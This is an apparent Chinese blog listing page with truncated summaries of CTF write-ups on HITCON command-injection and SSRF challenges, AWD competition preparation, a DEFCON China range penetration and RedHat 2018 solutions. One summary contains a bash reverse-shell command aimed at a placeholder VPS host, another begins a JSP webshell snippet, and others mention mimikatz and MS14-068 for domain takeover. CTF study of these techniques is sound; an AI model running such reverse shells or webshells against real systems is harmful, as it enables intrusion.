- 博客(8)
- 收藏
- 关注
RSS订阅原创 HITCON 2015 BabyFirst(命令执行绕正则)
题目地址:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_4/index.php借上次的docker环境,稍微改了下。本地搭了个环境玩。代码审计,整个程序的逻辑是为一个客户端创建一个sandbox/clientip的目录,通过正则表达检查参数值,要求所有的参数仅仅只能为数字和字母。而/bin/orange最终发现只是...
2018-05-16 22:44:35
1744
原创 DEFCON CHINA&BCTF的一些随笔
萌新的第一次线下决赛,毫无意外的被打爆,打扰了我太菜了,告辞!下面记录一下这次的收获吧。靶场渗透这次靶场是打的真的爽,也学习了很多东西。从一个博客开始到服务器到内网最后拿域控权限,打的真的爽啊。这里有5个flag,我们在拿域控,靶场总共6个flag。然后最开始博客的服务器里面我早就发现了一个pwn,应该最后一个flag。唯一的遗憾是没时间了,mimikatz没升级,拿ms14-068打的时候缺少p...
2018-05-14 21:27:57
3832
原创 CTF线下AWD攻防模式的准备工作及起手式
作为大一萌新我并没有打过AWD,可能我做梦都没有想到人生的第一场AWD是DEFCON CHINA吧~(滑稽我自己在服务器上搭了一个cms来模拟AWD场景。0X01 改ssh密码官方在给出服务器密码时,很有可能是默认的,需要赶快修改自己的密码并尝试能不能登陆别人的靶机,搞波事情嘿嘿嘿~0X02 dump源码首先可能没有给源码,需要自己把源码全dump下来。1.使用XFTP或者FileZilla Cl...
2018-05-10 00:05:26
87239
10
原创 HITCON 2015 lalala(SSRF)
题目连接:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_3/index.php一个文件上传题,尝试上传个图片,结果:好吧,环境没搭好,这不能怪我了,我只能看源码来搭了。但是就目前来看似乎可以SSRF.什么是ssrf?是时候系统的学一波了。参考链接:《SSRF漏洞中绕过IP限制的几种方法总结》《SSRF攻击原理与技巧...
2018-05-09 17:47:44
1926
原创 HITCON 2017 babyfirst-revenge-v2(命令执行绕过五)
题目地址:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_2/index.php发现和上一题大体相似,但是发现有一个不一样,长度从5变成了4,没办法利用>>二次写入了。但是我们如果就这样是没法儿按照字典序直接写入ls -t>g到文件的。 因为这一串无论怎么分割写入都无法遵从字典序或是字典序的逆序。然...
2018-05-07 21:30:18
1224
原创 HITCON 2017 babyfirst-revenge(命令执行绕过四)
中午睡了一觉,醒来两点多了,发现几个群里又有人在黑我这个萌新菜比了.....然后用两个多小时ak了iscc放的题,这让我忍不住再次喷一波iscc...老子都ak了排名还5、60名...就因为昨天写红帽杯要交的wp没打....我真tm无语...算了算了不喷了。开始今天的修炼!在远程放好如下内容:bash -c "bash -i >& /dev/tcp/vpsip/vpsport 0&l...
2018-05-03 00:36:48
704
原创 第二届红帽杯线上初赛 RedHat 2018 WriteUp
又是一个划水的比赛,作看高中生吊打全场orz,太强了。WEBsimple upload进入一个登陆页面,抓包之后发现cookie有admin=0改成1之后进入了一个上传页面,获取指纹之后,明显是Apache Tomcat,传一个一句话asp马过去试试。上传yulige.jsp.jpg<% if("023".equals(request.getParameter("pwd"))){ ...
2018-05-02 22:00:45
5715
1
原创 HITCON 2017 babyfirst-revenge(命令执行绕过三)
今天写了下红帽杯要交的wp,颓废了一会儿,喷了一发iscc,然后ak了iscc目前放的题。开始今天的修炼了。其实已经12点,注定今天又做不了多少。估计要被梅子酒笑话了md...再理一下之前有的思路:1.利用'>'+'字符'+'\'+'\'几个字符创建文件(ps:'\'是会把后面的转义掉的,所以如果要让他出现在文件名中,就得用两个\\2.使用ls串接命令可以用ls -t (ps:ls -t...
2018-05-02 00:40:58
890
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人